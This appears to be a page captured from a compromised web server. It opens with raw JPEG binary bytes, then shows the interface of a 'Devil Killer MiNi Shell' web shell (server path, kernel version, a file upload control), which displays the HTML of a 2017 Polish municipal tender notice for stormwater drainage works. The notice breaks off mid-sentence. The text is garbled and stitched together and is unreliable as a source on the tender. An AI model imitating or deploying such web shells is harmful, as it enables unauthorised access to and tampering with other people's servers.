JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170608/528864-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 528864-N-2017 z dnia 2017-06-08 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Ujazd</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Odprowadzenie wód burzowych w SAG Olszowa, Zimna Wódka"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">. Inwestycja dofinansowana jest z Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2014-2020 w ramach Osi priorytetowej II Konkurencyjna gospodarka Działania 2.2 Przygotowanie terenów inwestycyjnych na rzecz gospodarki. Poddziałania 2.2.1 Przygotowanie terenów inwestycyjnych</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Ujazd</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">53141329000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Sławięcicka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">19</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">47143 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Ujazd</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">opolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-77 4048750,4048757,4048757, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">umig@ujazd.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-77 4637081</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ujazd.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.ujazd.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy składać w formie pisemnej pod rygorem nieważności</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Ujeździe, ul. Sławięcicka 19, 47-143 Ujazd</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Odprowadzenie wód burzowych w SAG Olszowa, Zimna Wódka"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">GT.271.6.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">nie dotyczy</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Zgodnie z art. 36aa ustawy Pzp, Zamawiający przeprowadzając jedno postępowanie podzielił zamówienie na 2 części. Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia. Jednemu oferentowi zamawiający może udzielić zamówienia dla jednej lub obu części.</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zakres zamówienia obejmuje: Wykonanie robót związanych z odprowadzeniem wód burzowych w SAG Olszowa, Zimna Wódka z podziałem na zadanie nr 1 i zadanie nr 2, w tym:Dla zadania nr 1:1.ETAP V- PROJEKT ROZBUDOWY ZBIORNIKA NR 4 oraz KOLEKTOR KANALIZACJI DESZCZOWEJ WZDŁUŻ ul. AMERYKAŃSKIEJ ( pkt. 7.3 Opisu Technicznego) -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=26m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1000/120 L=383m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 800/90 L=20m wg wyliczenia: Razem kanał 2K-1 L=147m Odcinek kanału 2K-1 od studni 2S-10 do 2S-15 - roboty wykonano w innym postępowaniu L=127m dotyczy odrębnego zamówienia L=147-127=20m -Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 500/65 L=14m -Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 300/55 L=29m wg wyliczenia:Razem kanał 2K-3 L=54mOdcinek kanału 2K-3 od studni 2S-13do 2S-13a - roboty wykonano w innym postępowaniuL=25m dotyczy odrębnego zamówieniaL=54-25=29 mŁącznie: 26+383+20+14+29=472mStudnie kanalizacji deszczowejDN1500mm - typ centryczna -9 szt.DN1500mm- osadnikowa - 2szt.Wloty kanalizacji deszczowejDN 300mm -3 szt.DN 500mm -2 szt.DN 1000mm -1 szt.DN 1400mm -1 szt.Ogrodzenie panelowe H-1,80m zbiornik autostrada -612mDroga technologiczna o nawierzchni asfaltowej 2217m2Krawężniki drogowe 30x15x100 - 1202m2.ETAP VI- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK NR 4 ZE ZBIORNIKIEM"AUTOSTRADA" wraz z pompownią wód deszczowych-KANALIZACJA DESZCZOWA TŁOCZNA (Rurociąg 1)-Rura Dz 280/16mm PE-100, SDR 17, PN10 L=404m-Rura PE-100 , SDR17, PN100 DZ.400/23,7 mm L=89m przewiertowaStudnia odpowietrzająca DN2000 mm- 1 szt.Studnia odwadniająca DN2000 mm- 1 szt.Przepompownia wód deszczowych DN3000mm z komorą zasuw i wyposażeniem - 1 kmpl.Zasilanie elektryczne przepompowni wód opadowych - KSSE Olszowa - 1 kmpl.3.ETAP VI- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK NR 4 ZE ZBIORNIKIEM"AUTOSTRADA" wraz z pompownią wód deszczowych-KANALIZACJA DESZCZOWA TŁOCZNA (Rurociąg 2)-Rura Dz 280/16mm PE-100, SDR 17, PN10 L=404m-Rura PE-100 , SDR17, PN100 DZ.400/23,7 mm L=89m przewiertowaStudnia odpowietrzająca DN2000 mm- 1 szt.Studnia odwadniająca DN2000 mm- 1 szt.Przepompownia wód deszczowych DN3000mm z komorą zasuw i wyposażeniem - 1 kmpl.4.ETAP VII- PROJEKT ZBIORNIKA RETENCYJNO - CHŁONNEGO "AUTOSTRADA"Wloty kanalizacji deszczowejDN 400mm -2 sztZbiornik chłonno retencyjny "Autostrada" F=3482 m2Ogrodzenie panelowe H-1,80m zbiornik autostrada -291mDroga technologiczna o nawierzchni asfaltowej 321 m2Krawężniki drogowe 30x15x100 - 220mUmocnienie skarp zbiornika płyty ażurowe- 1570,45 m2Warstwa separacyjna z geowłókniny Typar 37 - 1570,45 m2Filtr piaskowo - żwirowy w dnie zbiornika gr. 0,5 m - 1510.32 m2/755,16 m3Krawężniki w dnie zbiornika 20x30x100 mm - 208,40mZASILANIE POMPOWNI ŚCIEKÓW DESZCZOWYCH I SANITARNYCH1. Ręczne kopanie rowów dla kabli, o głębokości do 1,0 m i szerokości dna wykopu do 0,6 m. - przekopy kontrolne. (szt. 15) - 30,00 m2. Ręczne zasypywanie przekopów kontrolnych j.w. - 30,00 m3. Ręczne kopanie rowów dla kabli, o głębokości do 0,8 m i szerokości dna wykopu do 0,4 m- 580,00 m4. Ręczne zasypywanie rowów dla kabli, o głębokości do 0,6 m i szerokości dna wykopu do 0,4 m - 580,00 m5. Przepusty jednootworowe o długości do 15 m z rur ochronnych z pcw o średnicy 110 mm wykonane wiertnicą ręczną - 35,00 m6. Nasypanie 2-warstw piasku na dnie rowu kablowego o szerokości do 0,4 m - 1 160,00 m7. Układanie rur ochronnych z pcw o średnicy do 110 mm w wykopie - 20,00 m8. Ręczne układanie kabli wielożyłowych o masie do 5,5 kg/m w rowach kablowych, przykrytych folią kalandrowaną - 561,00 m9. Układanie kabli wielożyłowych o masie do 5,5 kg/m w rurach, pustakach lub kanałach zamkniętych - 60,00 m10. Kabel typu YAKXS 4x240 mm2 - 621,00 m11. Obróbka na sucho kabli energetycznych wielożyłowych z żyłami aluminiowymi na napięcie do 1 kV. Zarobienie końca kabla 4-żyłowego o przekroju żył do 240 mm2 - 2,00 szt12. Przygotowanie podłoża pod złącze kablowo-pomiarowe - tylko R i S - 1,00 szt13. Montaż na gotowym podłożu złącza kablowo-pomiarowego kompletnego - 1,00 szt14. Wywóz nadmiaru ziemi samochodami samowyładowczymi na odległość do 1 km- 46,50 m315. Wywóz nadmiaru ziemi samochodami samowyładowczymi na każdy następny 1 km do 5 km - 46,50 m316. Linie kablowe do 1 kV 4-żyłowe - pomiar - 1,00 odcinek17. Złącze kablowo-pomiarowe - pomiar - 1,00 szt18. Obsługa geodezyjna, nadzory branżowe, dopuszczenia RE i wyłączenia, inne -1,00 kplUWAGA!!!1. (Wyjaśnienie do pkt 5.2.5 Opisu Technicznego) Niniejszy projekt zakłada wybudowanie jednej pompowni ścieków z dwiema pompami z pełnym wyposażeniem (stopy sprzęgające piony tłoczne itd.) oraz jednej pompowni bez wyposażenia. Komory zasuw i studnie na obydwóch rurociągach tłocznych są w pełni uzbrojone w projektowaną armaturę.2. Zakres robót nie obejmuje kanału 2K-1 od studni 2S-10 do 2S-15 oraz kanału 2K-3 - ten odcinek kanalizacji został wykonany podczas realizacji innego postępowania, studnia 2S-10 została wykonana i zaślepiona, przy realizacji przedmiotowej inwestycji należy się do niej podłączyć.Dla zadania nr 2:1.ETAP IV- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK "RONDO" ze ZBIORNIKIEM NR 4 -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką klinową Dz1400/160 L=86m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=100m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1000/120 L=76m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 900/110 L=85m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 700/80 L=69m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 600/75 L=115mRazem: 86+100+76+85+69+115=531mStudnie kanalizacji deszczowejDN2000mm - typ centryczna -4 szt.DN1000mm- typ styczna -7 szt.DN1200mm- typ centryczna -2 szt.2. ETAP I - PROJEKT: ROZBUDOWA ZBIORNIKA NR 3 (ZAKRES PRAC ZWIĄZANYCH Z ROZBUDOWĄ ZBIORNIKA pkt. 7.1 opisu technicznego) -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=55m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 500/65 L=21m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 400/55 L=6mRazem: 82mStudnie kanalizacji deszczowejDN2000mm - typ centryczna -2 szt.DN1000mm- typ styczna -5 szt.Studnia osadnikowa DN1500 mm - 1 szt.Wylot kanalizacji deszczowejDN 400mm - 2 szt.DN 500mm - 1 szt.DN 1200mm - 1 szt.Zasuwa wrzecionowa - 1 szt.Separator koalescencyjny zintegrowany z osadnikiem i bypassem 15/150 Dz 1800 - 1 kmpl.Zbiornik chłonno retencyjny nr 3 F=3810 m2Umocnienie skarp zbiornika płyty ażurowe- 2128,77m2Warstwa separacyjna z geowłókniny Typar 37 - 2178,77 m2Filtr piaskowo - żwirowy w dnie zbiornika gr. 0,5 m - 1762,06 m2/881,03 m3Krawężniki w dnie zbiornika 2x30x100 mm - 253,82mOgrodzenie panelowe H-1,80m zbiornik autostrada -326mSchody skarpowe L= 8,4mDroga technologiczna o nawierzchni asfaltowej 494,35 m2Krawężniki drogowe 30x15x100 - 308 m3.ETAP II- PROJEKT KANALIZACJI DESZCZOWEJ ŁĄCZĄCEJ ZBIORNIK NR 3 ZE ZBIORNIKIEM "RONDO" -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz1200/135 L=48m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 800/90 L=46m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 600/75 L=150m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 400/55 L=368mRazem:612 mStudnie:Studnia DN 2000 mm- 3 szt.Studnia DN 1200 mm -1szt.Studnia DN1500 mm - 2szt.Studnia DN 1000 mm - 12 szt.Studnia odpowietrzająca DN2000 mm- 1 szt.Studnia odwadniająca DN2000 mm- 1 szt.Odtworzenie nawierzchni bitumicznej 90 m24.ETAP III- PROJEKT ROZBUDOWY ZBIORNIKA "RONDO" ( pkt. 7.2 Opisu Technicznego) -KANALIZACJA DESZCZOWA GRAWITACYJNASieć kanalizacji deszczowej-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 800/90 L=44m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 500/65 L=4m-Rura żelbetowa Klasy A z uszczelką zintegrowaną Dz 300/55 L=15m-Rura PCV-U (lite) klasy S, SN8 200/5,9mm,-przebudowa istniejącej Ksdługość fabryczna L=6m z kielichem i uszczelką L=16mRazem: L=44+4+15+16=79mUWAGA!!!1. Wykonawca realizując zadanie nr 2 zobowiązany jest zachować szczególną ostrożność przy wykonywaniu robót na działkach nr 3/12 i 3/13 (własność firmy IFA - Gmina posiada prawo do dysponowania nieruchomością na cele budowlane) z uwagi na obecne zagospodarowanie terenu (istniejące ogrodzenie, skarpa i parking), co Wykonawca powinien wziąć pod uwagę przy kalkulacji ceny oferty. Po wykonanych robotach teren ten będzie należało przywrócić do stanu pierwotnego. Dlatego też konieczne jest przeprowadzenie wizji lokalnej w terenie.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45231300-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45247270-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232423-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231400-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45230000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości 